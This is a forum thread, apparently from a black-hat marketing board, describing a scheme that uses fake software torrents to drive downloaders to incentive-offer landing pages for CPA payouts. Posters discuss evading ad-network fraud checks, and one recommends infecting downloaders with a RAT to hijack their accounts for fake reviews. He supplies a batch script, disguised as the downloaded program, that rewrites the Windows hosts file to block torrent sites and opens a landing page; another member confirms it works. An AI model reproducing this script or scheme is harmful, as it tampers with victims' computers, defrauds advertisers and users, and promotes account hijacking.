$10 - $60 A Day Method Using CPA (Blackhat/Whitehat Versions Included)

Double posted BHW is driving me nut alway not responding after posting
 
Last edited:
Cound you explain more about how to make a good landing page?

Once again, Take a SCREENSHOT of your program download page then slice, export to html and add your own links in a html editor like dreamweaver.

Here is a video explaining it: http://www.youtube.com/watch?v=DVfxe4pqvo8
 
Oh ok just a tips for people whos wondering
 
Every thing is fine in this method except the torrent thing because sites like thepiratebay, kat.ph delete the fake torrents.Thanks for sharing:D
 
SilverMovieDownloads , i am really wish you only help and patience, because of so much noob questions out there.
So I tried it with Photoshop yesterday. over 500 downloads in 1 day. 200 hits to a landing page. 0% conversation for now.
I used incentive offer covering "final download" landing page. Pretty much surprised, because it never converted, so now it doesn't work for me,
will keep you updated.
Cheers

what kind of conversion are you getting?
 
SilverMovieDownloads , i am really wish you only help and patience, because of so much noob questions out there.
So I tried it with Photoshop yesterday. over 500 downloads in 1 day. 200 hits to a landing page. 0% conversation for now.
I used incentive offer covering "final download" landing page. Pretty much surprised, because it never converted, so now it doesn't work for me,
will keep you updated.
Cheers

Tell me what you did step by step, Did you screenshot the official page?

BTW good on you for taking action!!!
 
SilverMovieDownloads.....your method dont work, already prove people try and did't work, i see you ignore my PM, well its okay, i will try at least, if i fail, i can thank you for your lousy method :P
 
SilverMovieDownloads.....your method dont work, already prove people try and did't work, i see you ignore my PM, well its okay, i will try at least, if i fail, i can thank you for your lousy method :P

Sorry man but i don't have time to explain when i ALREADY explained it in the original post. Remember this
first-spoon-feedMVT.jpg


Also dukec0re, I think it's pretty obvious that you are not gonna try 110% on this method then post that it didn't work. No worries, That's standard procedure in BHW when a newbie hates on another person's method and then on top of that sends pms of great annoyance.
 
Last edited:
cool it bro, i was confused with the info in this thread, i will research and get it, but its always good to connect with people, you know, when we think we are great, but by seeing JFrase thread and looking about how he do things, he probably earning my full year income in a day or two. peace out
 
cool it bro, i was confused with the info in this thread, i will research and get it, but its always good to connect with people, you know, when we think we are great, but by seeing JFrase thread and looking about how he do things, he probably earning my full year income in a day or two. peace out

There we go, Research it. I already put the method in the simplest terms i possibly can, If you don't understand a certain step or term. Simply do a search on it in google or BHW.
 
there are more than one problems with this method :)
i've actually done it about a year ago and it can convert but:
1. if you use offers that don't allow incentivised trafic you're likely to get banned if found
2. most if not all the people who will complete the offer will never complete the rest of the forms and that makes the advertisers block you or even get you banned
3. big torrent sites are fairly good at removing fake torrents
4. if you just iframe the textbox for the email then the user has to hit enter to complete the form.. lots of people click on the register/send/go button and don't even know that they can submit the form with enter and that lowers conversions alot :)

if you want to really make some cash with this you have to come up with methods of fixing/going around the 4 very important problems :)


1. - fake referer is a start but networks can still see that something is wrong because unless you do something fishy you have no reason to blank the referer(op said the best way to get around this)
2. this is the hardest one to fix... the only way to really fix it is to get some real conversions at least 10-15% of your conversions must be real
another way to fix this is to make the ifframe full size after the user wrote the email so maybe some of them will complete the rest of the forms
3. the best way i found around this is to give the users that download your torrents a small "virus" / rat / etc... that blocks their access to the torrents site
why block access? Because once they realise that it's fake most of them will go back and report your torrent and get it removed

another bonus: if you put a rat in the user's pc and block their access, you can use their accounts to write comments on your torrents ( something like: It works great, i've been waiting for this. Thanks! etc...)

if you don't want to use viruses just use the bat with something like this:

Code:
echo. >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 thepiratebay.se >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 torrentsite.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 anothertorrentsite.com >> %windir%\system32\drivers\etc\hosts

start http://landingpage.com/

make the bat to exe like normal and then everyone who runs the exe won't be able to go back to the site where they downloaded the torrent


4. use your immagination :) enough with the spoon feeding
 
the hardest part for me is to get downloads, tpb ban me so quickly. other small sites dont get me downloads.
 
the hardest part for me is to get downloads, tpb ban me so quickly. other small sites dont get me downloads.

yaseking, The traffic part is optional. You can just drive traffic with other sources like youtube, fb, twitter etc.
 
there are more than one problems with this method :)
i've actually done it about a year ago and it can convert but:
1. if you use offers that don't allow incentivised trafic you're likely to get banned if found
2. most if not all the people who will complete the offer will never complete the rest of the forms and that makes the advertisers block you or even get you banned
3. big torrent sites are fairly good at removing fake torrents
4. if you just iframe the textbox for the email then the user has to hit enter to complete the form.. lots of people click on the register/send/go button and don't even know that they can submit the form with enter and that lowers conversions alot :)

if you want to really make some cash with this you have to come up with methods of fixing/going around the 4 very important problems :)


1. - fake referer is a start but networks can still see that something is wrong because unless you do something fishy you have no reason to blank the referer(op said the best way to get around this)
2. this is the hardest one to fix... the only way to really fix it is to get some real conversions at least 10-15% of your conversions must be real
another way to fix this is to make the ifframe full size after the user wrote the email so maybe some of them will complete the rest of the forms
3. the best way i found around this is to give the users that download your torrents a small "virus" / rat / etc... that blocks their access to the torrents site
why block access? Because once they realise that it's fake most of them will go back and report your torrent and get it removed

another bonus: if you put a rat in the user's pc and block their access, you can use their accounts to write comments on your torrents ( something like: It works great, i've been waiting for this. Thanks! etc...)

if you don't want to use viruses just use the bat with something like this:

Code:
echo. >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 thepiratebay.se >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 torrentsite.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 anothertorrentsite.com >> %windir%\system32\drivers\etc\hosts

start http://landingpage.com/

make the bat to exe like normal and then everyone who runs the exe won't be able to go back to the site where they downloaded the torrent


4. use your immagination :) enough with the spoon feeding

That's pretty smart, Does the code actually work?
 
yes it does... you just have to write all the torrent sites where you upload :)
 
another bonus: if you put a rat in the user's pc and block their access, you can use their accounts to write comments on your torrents ( something like: It works great, i've been waiting for this. Thanks! etc...)

How can I do that?
 
How can I do that?

If you just want to block the user's access to the torrent site, Use m4dm4n's code that he posted above. If you want to also gain access to their account then i think you will have to pay a programmer to produce the code.
 
Back
Top